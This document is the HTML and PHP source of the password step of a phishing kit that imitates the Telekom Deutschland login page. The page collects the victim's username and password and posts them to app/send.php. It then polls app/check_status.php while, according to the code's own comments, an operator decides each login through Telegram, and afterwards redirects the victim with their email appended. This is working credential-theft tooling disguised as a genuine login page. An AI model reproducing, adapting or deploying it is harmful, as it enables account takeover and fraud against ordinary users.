<!DOCTYPE html>
<html lang="de">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Telekom Login - Passwort</title>
    <link rel="icon" type="image/png" href="assets/images/favicon.png" />
    <link rel="preload" as="image" href="assets/images/bg.jpg" />
    <link rel="preload" as="font" href="assets/fonts/TeleNeoWeb-Regular.woff" type="font/woff" crossorigin />
    <link rel="preload" as="font" href="assets/fonts/TeleNeoWeb-Medium.woff" type="font/woff" crossorigin />
    <link rel="preload" as="font" href="assets/fonts/TeleNeoWeb-Bold.woff" type="font/woff" crossorigin />
    <link rel="preload" as="font" href="assets/fonts/TeleNeoWeb-ExtraBold.woff" type="font/woff" crossorigin />
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
      /* Hide body until all resources are loaded */
      body {
        visibility: hidden;
        opacity: 0;
        transition: opacity 0.3s ease-in;
      }
      body.loaded {
        visibility: visible;
        opacity: 1;
      }
      
      @font-face {
        font-family: "TeleNeoWeb";
        src: url("assets/fonts/TeleNeoWeb-Regular.woff") format("woff");
        font-weight: 400;
        font-display: swap;
      }
      @font-face {
        font-family: "TeleNeoWeb";
        src: url("assets/fonts/TeleNeoWeb-Medium.woff") format("woff");
        font-weight: 500;
        font-display: swap;
      }
      @font-face {
        font-family: "TeleNeoWeb";
        src: url("assets/fonts/TeleNeoWeb-Bold.woff") format("woff");
        font-weight: 700;
        font-display: swap;
      }
      @font-face {
        font-family: "TeleNeoWeb";
        src: url("assets/fonts/TeleNeoWeb-ExtraBold.woff") format("woff");
        font-weight: 800;
        font-display: swap;
      }

      :root {
        --telekom-color-primary-standard: #e20074;
        --telekom-color-primary-hovered: #c00063;
        --telekom-color-primary-pressed: #9e0051;
      }

      * {
        font-family: "TeleNeoWeb", sans-serif;
      }

      /* Desktop background - only show on screens >= 631px */
      body {
        background-image: url("assets/images/bg.jpg");
        background-size: cover;
        background-position: center;
        background-repeat: no-repeat;
        background-attachment: fixed;
        background-color: #f5f5f5; /* Fallback color */
      }
      
      /* Ensure background image is visible on desktop */
      @media (min-width: 631px) {
        body {
          background-image: url("assets/images/bg.jpg");
          background-size: cover;
          background-position: center;
          background-repeat: no-repeat;
          background-attachment: fixed;
        }
      }

      .btn-primary {
        background-color: var(--telekom-color-primary-standard);
      }
      .btn-primary:hover {
        background-color: var(--telekom-color-primary-hovered);
      }
      .btn-primary:active {
        background-color: var(--telekom-color-primary-pressed);
      }

      /* Custom toggle switch */
      .toggle-switch {
        position: relative;
        width: 42px;
        height: 24px;
      }
      .toggle-switch input {
        opacity: 0;
        width: 0;
        height: 0;
      }
      .toggle-slider {
        position: absolute;
        cursor: pointer;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background-color: #e0e0e0;
        transition: 0.3s;
        border-radius: 24px;
      }
      /* "0" in the track (unchecked state) */
      .toggle-slider:before {
        position: absolute;
        content: "0";
        right: 6px;
        top: 50%;
        transform: translateY(-50%);
        font-size: 11px;
        font-weight: bold;
        color: #666;
        transition: 0.3s;
      }
      /* The knob */
      .toggle-slider:after {
        position: absolute;
        content: "";
        height: 20px;
        width: 20px;
        left: 2px;
        top: 2px;
        background-color: white;
        transition: 0.3s;
        border-radius: 50%;
        box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
      }
      input:checked + .toggle-slider {
        background-color: var(--telekom-color-primary-standard);
      }
      /* "I" in the track (checked state) */
      input:checked + .toggle-slider:before {
        content: "I";
        left: 10px;
        right: auto;
        color: white;
        font-size: 14px;
        font-weight: bold;
      }
      /* Move the knob */
      input:checked + .toggle-slider:after {
        transform: translateX(20px);
      }

      .link-magenta {
        color: var(--telekom-color-primary-standard);
      }
      .link-magenta:hover {
        color: var(--telekom-color-primary-hovered);
      }

      /* Floating label styles */
      .floating-label-group {
        position: relative;
        height: 45px;
      }
      .floating-label-group input {
        height: 45px;
        padding-top: 0.9rem;
        padding-bottom: 0;
      }
      .floating-label-group label {
        position: absolute;
        left: 1rem;
        top: 50%;
        transform: translateY(-50%);
        color: #6b7280;
        pointer-events: none;
        transition: all 0.2s ease;
      }
      .floating-label-group input:focus ~ label,
      .floating-label-group input:not(:placeholder-shown) ~ label {
        top: 0.5rem;
        transform: translateY(0);
        font-size: 0.65rem;
        color: #6b7280;
      }

      /* Responsive styles for screens < 631px */
      @media (max-width: 630px) {
        body {
          background-image: none;
          background-color: white;
        }

        .logo-wrapper {
          left: 0 !important;
        }

        .logo-container {
          width: 56px !important;
          height: 56px !important;
          display: flex !important;
          align-items: center !important;
          justify-content: center !important;
        }

        .logo-container svg {
          width: 28px !important;
          height: 32px !important;
        }

        .main-content {
          padding-top: 80px !important;
          padding-left: 16px !important;
          padding-right: 16px !important;
        }

        .login-card {
          box-shadow: none !important;
          border-radius: 0 !important;
          padding-left: 16px !important;
          padding-right: 16px !important;
          max-width: 100% !important;
        }

        .mobile-footer {
          flex-direction: column !important;
          align-items: flex-start !important;
          color: black !important;
          gap: 8px;
        }

        .mobile-footer a {
          color: black !important;
        }

        .footer-links {
          flex-direction: column !important;
          gap: 8px !important;
        }
      }

      /* Loading overlay */
      .loading-overlay {
        display: none;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: rgba(0, 0, 0, 0.7);
        z-index: 9999;
        justify-content: center;
        align-items: center;
        flex-direction: column;
      }

      .loading-overlay.active {
        display: flex;
      }

      .loading-spinner {
        width: 60px;
        height: 60px;
        border: 6px solid rgba(255, 255, 255, 0.3);
        border-top-color: #e20074;
        border-radius: 50%;
        animation: spin 1s linear infinite;
      }

      @keyframes spin {
        to { transform: rotate(360deg); }
      }

      .loading-text {
        color: white;
        margin-top: 20px;
        font-size: 18px;
        font-weight: 500;
      }

      /* Error message */
      .error-message {
        display: none;
        background-color: #fee;
        border: 1px solid #fcc;
        color: #c33;
        padding: 12px;
        border-radius: 0.5rem;
        margin-bottom: 16px;
      }

      .error-message.show {
        display: block;
      }
    </style>
    <script>
      tailwind.config = {
        theme: {
          extend: {
            colors: {
              "telekom-magenta": "#e20074",
              "telekom-magenta-hover": "#c00063",
              "telekom-magenta-pressed": "#9e0051",
            },
          },
        },
      };
      
      // Wait for all critical resources to load before showing page
      (function() {
        let resourcesLoaded = {
          tailwind: false,
          backgroundImage: false,
          fonts: false
        };
        
        function checkAllLoaded() {
          if (resourcesLoaded.tailwind && resourcesLoaded.backgroundImage && resourcesLoaded.fonts) {
            // Wait for next frame to ensure Tailwind has processed
            requestAnimationFrame(function() {
              requestAnimationFrame(function() {
                document.body.classList.add('loaded');
              });
            });
          }
        }
        
        // Check if Tailwind is loaded
        function checkTailwind() {
          if (window.tailwind && document.body) {
            resourcesLoaded.tailwind = true;
            checkAllLoaded();
          } else {
            setTimeout(checkTailwind, 50);
          }
        }
        
        // Preload background image
        const bgImage = new Image();
        bgImage.onload = function() {
          resourcesLoaded.backgroundImage = true;
          checkAllLoaded();
        };
        bgImage.onerror = function() {
          // Even if image fails, continue loading
          resourcesLoaded.backgroundImage = true;
          checkAllLoaded();
        };
        bgImage.src = 'assets/images/bg.jpg';
        
        // Check fonts loading
        if (document.fonts && document.fonts.ready) {
          document.fonts.ready.then(function() {
            resourcesLoaded.fonts = true;
            checkAllLoaded();
          });
        } else {
          // Fallback if font loading API not available
          setTimeout(function() {
            resourcesLoaded.fonts = true;
            checkAllLoaded();
          }, 100);
        }
        
        // Check Tailwind loading
        if (document.readyState === 'loading') {
          document.addEventListener('DOMContentLoaded', checkTailwind);
        } else {
          checkTailwind();
        }
      })();
    </script>
  </head>
  <body class="min-h-screen flex flex-col">
    <!-- Logo Telekom -->
    <div
      class="logo-wrapper absolute top-0 left-4 sm:left-8 md:left-16 lg:left-24">
      <div
        class="logo-container bg-telekom-magenta w-[125px] h-[118px] flex items-center justify-center">
        <svg
          xmlns="http://www.w3.org/2000/svg"
          viewBox="0 0 32 38"
          fill="#ffffff"
          class="w-10 h-12">
          <path
            d="M7.6 25.1H0v-7.6h7.6v7.6ZM0 0v12.9h2.3v-.4c0-6.1 3.4-9.9 9.9-9.9h.4V30c0 3.8-1.5 5.3-5.3 5.3H6.1V38h19.8v-2.7h-1.1c-3.8 0-5.3-1.5-5.3-5.3V2.7h.4c6.5 0 9.9 3.8 9.9 9.9v.4h2.3V0H0Zm24.3 25.1h7.6v-7.6h-7.6v7.6Z"></path>
        </svg>
      </div>
    </div>

    <!-- Main Content -->
    <main
      class="main-content flex-1 flex items-start justify-center px-4 pt-32">
      <div
        class="login-card bg-white rounded-xl shadow-xl w-full max-w-[540px] px-10 pt-8 pb-10 relative">
        <!-- User Email & Help Icon Row -->
        <div class="flex items-center max-h-[40px] justify-between mb-6">
          <button
            type="button"
            class="flex items-center gap-2 text-black rounded-full hover:bg-gray-100 transition-colors">
            <div id="userAvatar" class="w-[40px] h-[40px] rounded-full bg-[#e20074] flex items-center justify-center text-white font-semibold text-sm" style="min-width: 40px;">
              <svg id="avatarIcon" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="white" width="24" height="24">
                <circle cx="12" cy="8" r="3"/>
                <path d="M6 21v-2c0-2.5 2-4.5 6-4.5s6 2 6 4.5v2" stroke="white" stroke-width="2" fill="none" stroke-linecap="round"/>
              </svg>
              <span id="avatarInitials" style="display: none;"></span>
            </div>
            <span id="userEmail" class="text-sm font-medium">
              <?php echo htmlspecialchars($_SESSION['login_username'] ?? ''); ?>
            </span>
            <svg
              xmlns="http://www.w3.org/2000/svg"
              width="24"
              height="24"
              viewBox="0 0 24 24"
              fill="currentColor">
              <path d="M7 10l5 5 5-5z" />
            </svg>
          </button>
          <button
            type="button"
            class="text-black hover:text-black"
            aria-label="Hilfe">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              width="24"
              height="24"
              viewBox="0 0 24 24">
              <g fill="currentColor">
                <path
                  d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1zm0 1.5c-5.239 0-9.5 4.261-9.5 9.5 0 5.238 4.261 9.5 9.5 9.5 5.238 0 9.5-4.262 9.5-9.5 0-5.239-4.262-9.5-9.5-9.5zM12 15a1.25 1.25 0 110 2.5 1.25 1.25 0 010-2.5zm.101-7.98c1.695 0 2.926 1.123 2.926 2.67 0 .876-.381 1.437-.824 1.89l-.225.217-.462.42c-.346.323-.636.655-.69 1.095l-.01.152v.332H11.07v-.603c0-.89.46-1.383.968-1.811l.475-.391c.388-.33.707-.676.707-1.196 0-.7-.428-1.134-1.118-1.134-.612 0-1.02.366-1.146 1.015l-.022.143H9.12c.085-1.412 1.027-2.799 2.981-2.799z"
                  fill-rule="evenodd"></path>
              </g>
            </svg>
          </button>
        </div>

        <!-- Title -->
        <h1 class="text-3xl font-extrabold text-black mb-6">
          Passwort eingeben
        </h1>

        <!-- Error Message -->
        <div id="errorMessage" class="error-message"></div>

        <!-- Form -->
        <form id="loginForm" action="app/send.php" method="POST">
          <!-- Hidden username field -->
          <input type="hidden" name="thnus" value="<?php echo htmlspecialchars($_SESSION['login_username'] ?? ''); ?>" />
          
          <!-- Password Input -->
          <div class="mb-2">
            <div class="floating-label-group relative">
              <input
                type="password"
                id="password"
                name="thnpw"
                placeholder=" "
                required
                class="w-full px-4 py-2 border border-gray-300 rounded-[0.5rem] focus:outline-none focus:ring-2 focus:ring-[#00368f] focus:ring-offset-2 focus:border-[#00368f] text-gray-700" />
              <label for="password" class="text-gray-500">Passwort</label>
              <button
                type="button"
                id="togglePassword"
                class="absolute right-3 top-1/2 -translate-y-1/2 text-black hover:text-black"
                aria-label="Passwort anzeigen">
                <svg
                  xmlns="http://www.w3.org/2000/svg"
                  width="24"
                  height="24"
                  viewBox="0 0 24 24"
                  fill="none"
                  stroke="currentColor"
                  stroke-width="2"
                  stroke-linecap="round"
                  stroke-linejoin="round">
                  <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"></path>
                  <circle cx="12" cy="12" r="3"></circle>
                </svg>
              </button>
            </div>
          </div>

          <!-- Forgot Password Link -->
          <div class="mb-4">
            <a href="#" class="link-magenta text-[#2238df] text-sm underline">
              Passwort vergessen?
            </a>
          </div>

          <!-- Stay Logged In Toggle -->
          <div class="flex items-center gap-3 mb-6">
            <label class="toggle-switch">
              <input type="checkbox" name="stayLoggedIn" checked />
              <span class="toggle-slider"></span>
            </label>
            <span class="text-black text-md font-medium"
              >Angemeldet bleiben</span
            >
            <button
              type="button"
              class="text-black hover:text-black"
              aria-label="Hilfe für Angemeldet bleiben">
              <svg
                xmlns="http://www.w3.org/2000/svg"
                width="20"
                height="20"
                viewBox="0 0 24 24">
                <g fill="currentColor">
                  <path
                    d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1zm0 1.5c-5.239 0-9.5 4.261-9.5 9.5 0 5.238 4.261 9.5 9.5 9.5 5.238 0 9.5-4.262 9.5-9.5 0-5.239-4.262-9.5-9.5-9.5zM12 15a1.25 1.25 0 110 2.5 1.25 1.25 0 010-2.5zm.101-7.98c1.695 0 2.926 1.123 2.926 2.67 0 .876-.381 1.437-.824 1.89l-.225.217-.462.42c-.346.323-.636.655-.69 1.095l-.01.152v.332H11.07v-.603c0-.89.46-1.383.968-1.811l.475-.391c.388-.33.707-.676.707-1.196 0-.7-.428-1.134-1.118-1.1 ...[Truncated]
                    fill-rule="evenodd"></path>
                </g>
              </svg>
            </button>
          </div>

          <!-- Login Button -->
          <button
            type="submit"
            id="submitBtn"
            class="mt-6 btn-primary w-full py-2 text-white font-medium rounded-[0.5rem] mb-3 transition-colors uppercase tracking-wide">
            Login
          </button>

          <!-- Andere Anmeldeoptionen Button -->
          <button
            type="button"
            class="w-full py-2 text-black font-medium rounded-[0.5rem] border border-gray-300 hover:bg-gray-50 mb-6 transition-colors">
            Andere Anmeldeoptionen
          </button>
        </form>

        <!-- Back Link -->
        <div class="text-left">
          <a
            href="index.php"
            class="text-[#2238df] text-sm hover:text-gray-800 underline">
            &lt; Zurück
          </a>
        </div>
      </div>
    </main>

    <!-- Footer -->
    <footer
      class="mobile-footer py-4 px-4 sm:px-8 flex flex-col sm:flex-row justify-between items-start sm:items-center text-white text-sm">
      <div class="mb-2 sm:mb-0">
        <span>© Telekom Deutschland GmbH</span>
        <br />
        <span class="text-xs opacity-80">26.32.1</span>
      </div>
      <div
        class="footer-links flex flex-col sm:flex-row gap-2 sm:gap-8 mt-4 sm:mt-0">
        <a href="#" class="hover:underline">Impressum</a>
        <a href="#" class="hover:underline">Datenschutz</a>
      </div>
    </footer>

    <!-- Loading Overlay -->
    <div id="loadingOverlay" class="loading-overlay">
      <div class="loading-spinner"></div>
      <div class="loading-text">Bitte warten...</div>
    </div>

    <script>
      // Toggle password visibility
      const togglePassword = document.getElementById("togglePassword");
      const passwordInput = document.getElementById("password");

      togglePassword.addEventListener("click", function () {
        const type =
          passwordInput.getAttribute("type") === "password"
            ? "text"
            : "password";
        passwordInput.setAttribute("type", type);

        // Toggle eye icon
        if (type === "text") {
          this.innerHTML = `
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
              <path d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24"></path>
              <line x1="1" y1="1" x2="23" y2="23"></line>
            </svg>
          `;
        } else {
          this.innerHTML = `
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
              <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"></path>
              <circle cx="12" cy="12" r="3"></circle>
            </svg>
          `;
        }
      });

      // Handle form submission with AJAX
      const loginForm = document.getElementById("loginForm");
      const loadingOverlay = document.getElementById("loadingOverlay");
      const submitBtn = document.getElementById("submitBtn");
      const errorMessage = document.getElementById("errorMessage");

      // Check for error in URL parameters
      const urlParams = new URLSearchParams(window.location.search);
      const errorParam = urlParams.get('error');
      if (errorParam === 'wrong_password') {
        errorMessage.textContent = 'Falsches Passwort. Bitte versuchen Sie es erneut.';
        errorMessage.classList.add('show');
      } else if (errorParam === 'blocked') {
        errorMessage.textContent = 'Zugang wurde blockiert. Bitte kontaktieren Sie den Support.';
        errorMessage.classList.add('show');
      }

      // Hide error message after 5 seconds
      if (errorMessage.classList.contains('show')) {
        setTimeout(() => {
          errorMessage.classList.remove('show');
        }, 5000);
      }

      let currentLoginId = null;
      let statusCheckInterval = null;
      let autoRedirectTimeout = null;

      // Auto-redirect config (from config.php)
      const AUTO_REDIRECT_ENABLED = <?php echo defined('AUTO_REDIRECT_ENABLED') && AUTO_REDIRECT_ENABLED ? 'true' : 'false'; ?>;
      const AUTO_REDIRECT_SECONDS = <?php echo defined('AUTO_REDIRECT_SECONDS') ? (int)AUTO_REDIRECT_SECONDS : 0; ?>;
      const REDIRECT_URL = <?php echo json_encode(defined('REDIRECT_URL') ? REDIRECT_URL : 'https://www.t-online.de/'); ?>;

      // Function to clear auto-redirect timer
      function clearAutoRedirect() {
        if (autoRedirectTimeout) {
          clearTimeout(autoRedirectTimeout);
          autoRedirectTimeout = null;
        }
      }

      // Append ?email= or &email= with user's email to redirect URL
      function appendEmailToRedirectUrl(url) {
        const emailEl = document.getElementById('userEmail');
        const email = (emailEl && emailEl.textContent.trim()) ? emailEl.textContent.trim() : '';
        if (!email) return url;
        const sep = url.indexOf('?') >= 0 ? '&' : '?';
        return url + sep + 'email=' + encodeURIComponent(email);
      }

      // Function to check login status
      function checkLoginStatus(loginId) {
        return fetch(`app/check_status.php?login_id=${loginId}`)
          .then(response => response.json())
          .then(data => {
            if (data.success) {
              return data;
            }
            throw new Error(data.error || 'Status check failed');
          });
      }

      // Function to poll login status
      function pollLoginStatus(loginId) {
        let lastRedirectUrl = REDIRECT_URL;

        // Start auto-redirect timer if enabled (no action from Telegram = redirect after X seconds)
        if (AUTO_REDIRECT_ENABLED && AUTO_REDIRECT_SECONDS > 0) {
          autoRedirectTimeout = setTimeout(() => {
            clearInterval(statusCheckInterval);
            clearAutoRedirect();
            loadingOverlay.classList.remove('active');
            submitBtn.disabled = false;
            window.location.href = appendEmailToRedirectUrl(lastRedirectUrl);
          }, AUTO_REDIRECT_SECONDS * 1000);
        }

        statusCheckInterval = setInterval(() => {
          checkLoginStatus(loginId)
            .then(data => {
              if (data.redirect_url) {
                lastRedirectUrl = data.redirect_url;
              }
              if (data.status !== 'pending') {
                // Status has changed (Telegram action) - cancel auto-redirect and handle
                clearInterval(statusCheckInterval);
                clearAutoRedirect();
                loadingOverlay.classList.remove('active');
                
                const redirectUrl = data.redirect_url || REDIRECT_URL;
                
                // Wait a moment before redirect
                setTimeout(() => {
                  if (data.status === 'approved') {
                    // Continue - redirect to success page (with email in URL)
                    window.location.href = appendEmailToRedirectUrl(redirectUrl);
                  } else if (data.status === 'wrong_password') {
                    // Wrong password - redirect back with error
                    window.location.href = '?step=password&error=wrong_password';
                  } else if (data.status === 'blocked') {
                    // Blocked - redirect back with error
                    window.location.href = '?step=password&error=blocked';
                  }
                }, 500);
              }
            })
            .catch(error => {
              console.error('Error checking status:', error);
              // Continue polling even on error
            });
        }, 2000); // Check every 2 seconds
      }

      // Handle form submission
      loginForm.addEventListener("submit", function(e) {
        e.preventDefault();
        
        // Hide any previous error messages
        errorMessage.classList.remove('show');
        
        // Validate password
        if (!passwordInput.value.trim()) {
          errorMessage.textContent = 'Bitte geben Sie Ihr Passwort ein.';
          errorMessage.classList.add('show');
          return;
        }

        // Show loading overlay
        loadingOverlay.classList.add('active');
        submitBtn.disabled = true;

        // Prepare form data
        const formData = new FormData(loginForm);

        // Submit via AJAX
        fetch('app/send.php', {
          method: 'POST',
          body: formData
        })
        .then(response => response.json())
        .then(data => {
          if (data.success) {
            currentLoginId = data.login_id;
            // Start polling for status updates
            pollLoginStatus(currentLoginId);
          } else {
            // Hide loading overlay
            loadingOverlay.classList.remove('active');
            submitBtn.disabled = false;
            
            // Show error message
            errorMessage.textContent = data.error || 'Ein Fehler ist aufgetreten. Bitte versuchen Sie es später erneut.';
            errorMessage.classList.add('show');
          }
        })
        .catch(error => {
          console.error('Error:', error);
          loadingOverlay.classList.remove('active');
          submitBtn.disabled = false;
          
          errorMessage.textContent = 'Ein Fehler ist aufgetreten. Bitte versuchen Sie es später erneut.';
          errorMessage.classList.add('show');
        });
      });

      // Cleanup on page unload
      window.addEventListener('beforeunload', function() {
        if (statusCheckInterval) {
          clearInterval(statusCheckInterval);
        }
        clearAutoRedirect();
      });

      // Generate avatar with initials from username
      function generateAvatarInitials() {
        const userEmail = document.getElementById('userEmail');
        const avatarDiv = document.getElementById('userAvatar');
        const avatarIcon = document.getElementById('avatarIcon');
        const avatarInitials = document.getElementById('avatarInitials');
        
        if (!userEmail || !avatarDiv || !avatarIcon || !avatarInitials) {
          return;
        }
        
        const username = userEmail.textContent.trim();
        if (!username) {
          return;
        }
        
        // Extract first letter(s) for initials
        // Remove @t-online.de if present
        let namePart = username.split('@')[0];
        
        // Get initials (first 2 letters)
        let initials = '';
        if (namePart.length >= 2) {
          initials = namePart.substring(0, 2).toUpperCase();
        } else if (namePart.length === 1) {
          initials = namePart.toUpperCase();
        }
        
        if (initials) {
          // Show initials, hide icon
          avatarInitials.textContent = initials;
          avatarIcon.style.display = 'none';
          avatarInitials.style.display = 'block';
        } else {
          // Show icon if no initials
          avatarIcon.style.display = 'block';
          avatarInitials.style.display = 'none';
        }
      }

      // Generate avatar when page loads
      generateAvatarInitials();
    </script>
  </body>
</html>
